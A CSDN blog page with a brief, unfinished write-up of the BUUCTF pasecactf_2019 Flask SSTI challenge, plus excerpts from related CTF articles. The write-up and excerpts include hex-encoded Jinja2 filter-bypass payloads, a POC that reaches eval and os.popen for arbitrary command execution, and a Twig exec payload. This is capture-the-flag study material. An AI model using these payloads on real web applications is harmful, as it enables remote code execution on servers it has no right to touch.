buuctf pasecactf_2019]flask_ssti

最新推荐文章于 2024-07-24 21:16:36 发布
最新推荐文章于 2024-07-24 21:16:36 发布
阅读量2.4k 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40800734/article/details/107011638
版权
本文详细介绍了如何测试和利用BuUCTF及PASECACTF 2019中遇到的Flask SSTI漏洞。通过十六进制绕过过滤,寻找基类和可用引用,逐步展开利用过程,包括调用`__subclasses__()`方法获取信息。虽然作者基础尚不扎实,但分享了学习和总结的经验,并提供了参考资料。
摘要由CSDN通过智能技术生成

1.测试存在ssti

2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过

3.寻找基类

4.寻找可用引用

{ {()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}}

5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法:

最低0.47元/天 解锁文章
qq_40800734
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3258
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1238
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
BUU [PASECA2019]honey_shop
最新发布
Jay17的博客
07-24 296
BUU [PASECA2019]honey_shop
BUUCTF--[pasecactf_2019]flask_ssti
qq_46263951的博客
08-12 553
根据题目我们可以知道这是一道Flask SSTI的题。 打开后允许我们输入东西,会返回用奇怪字符包裹的昵称。 我们试一下{{2*2}},然后返回4。这里存在这SSTI。 这里过滤了很多东西,就不在一一测试,使用十六进制进行绕过. #转16进制py脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(
[pasecactf_2019]flask_ssti
cjdgg的博客
07-05 2405
[pasecactf_2019]flask_ssti 进入题目后如下图所示 因为题目本身就提示ssti了,我也就直接尝试有没有过滤了 这里过滤了下划线,使用十六进制编码绕过,_编码后为\x5f, .过滤的话我们直接用[]包含绕过 这里过滤了单引号,我们用双引号绕过 这题过滤已经找完了,接下来是构造 相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js
[pasecactf_2019]flask_ssti proc ssti config
m0_64180167的博客
12-13 745
其实这个很简单首先ssti 直接fenjing一把锁了这里被加密后 存储在 config中了 然后我们去config中查看即可{{config}}可以获取到flag的值然后就可以写代码解密因为都是异或 异或的异或就是 原本 所以不需要修改就可以输出flag。
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
api.rar_API_IML语言_orwxh_python flask
09-23
在本文中,我们将深入探讨如何使用Python编程语言和Flask框架构建API,特别是与"IML语言"(可能指的是机器学习或数据科学中的接口)相关的API。标题中的"orwxh"可能是项目名称或者特定的功能模块,但由于缺乏具体...
douban_flask_pythonflask豆瓣_python_
10-02
标题 "douban_flask_pythonflask豆瓣_python_" 暗示了这是一个使用 Python 的 Flask 框架来实现的项目,目标是爬取并处理豆瓣电影Top250的数据。Flask是一个轻量级的Web服务程序,适合用于构建小型到中型的Web应用。...
第三次课c3.zip_flask_flask网站_网站 python
09-23
在本课程中,我们将深入探讨如何使用Python的Flask框架构建一个类似Instagram的网站。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,它以其灵活性和简洁性而受到开发者的喜爱。这个“第三次课c3.zip”...
app_pythonflask_
10-01
标题 "app_pythonflask_" 暗示了这个压缩包包含了一个使用Python Flask框架开发的应用程序。Flask是一个轻量级的Web服务器网关接口(WSGI)Web应用框架,由Armin Ronacher创建。它提供了基本的工具、库和约定来让...
CTFflask SSTI的研究
qq_46266956的博客
10-14 535
...
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 3864
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
buuctf-[Flask]SSTI
m0_62094846的博客
04-22 1151
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。 是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了 获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__i...
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 3148
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
CTF题型 SSTI(2) Flask-SSTI典型题巩固
qq_39947980的博客
03-13 1102
复现环境:2023 极客大挑战 klf系列 https://github.com/SycloverTeam/GeekChallenge2023/tree/main/Web 题目flag没有内容自己加内容测试。请参考 https://blog.csdn.net/qq_39947980/article/details/136692512?请参考 https://blog.csdn.net/qq_39947980/article/details/136692512?尝试判读出网不 发现出网 无回显。
BUUCTF刷题十一道(12)SSTI专题一
qq_45837896的博客
04-09 728
SSTI填坑
Buuctf [第三章 web进阶]SSTI 20
CyhDl666的博客
03-19 1463
进入页面用arjun扫描一下有什么url参数 这道题是最基础的了 直接给payload前面的payload吧 {{''.__class__.__base__.__subclasses__()[177].__init__.__globals__["__builtins__"].eval('__import__("os").popen("ls").read()')}} 页面返回:password is wrong: app bin boot dev etc home lib lib64 media m.
BUUCTF之[BJDCTF2020]Cookie is so stable ----- SSTI注入
weixin_44632787的博客
06-26 1580
BUUCTF之[BJDCTF2020]Cookie is so stable 题目 知识点:服务端模板注入攻击。SSTI里的Twig攻击。从网上找来的图片。参考链接:服务端模板注入攻击 然后网上提示说: 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 然后这题是 Twig 模块,用到的payload是: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_sel
bugkuctfweb题解simple_ssti_1
06-28
simple_ssti_1 是一个使用 Flask 框架编写的 web CTF 题目,主要涉及到服务器端模板注入 (Server-Side Template Injection, SSTI) 的问题。 这个题目中,使用者可以在输入框中输入任意字符串,然后后端会将这个字符...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值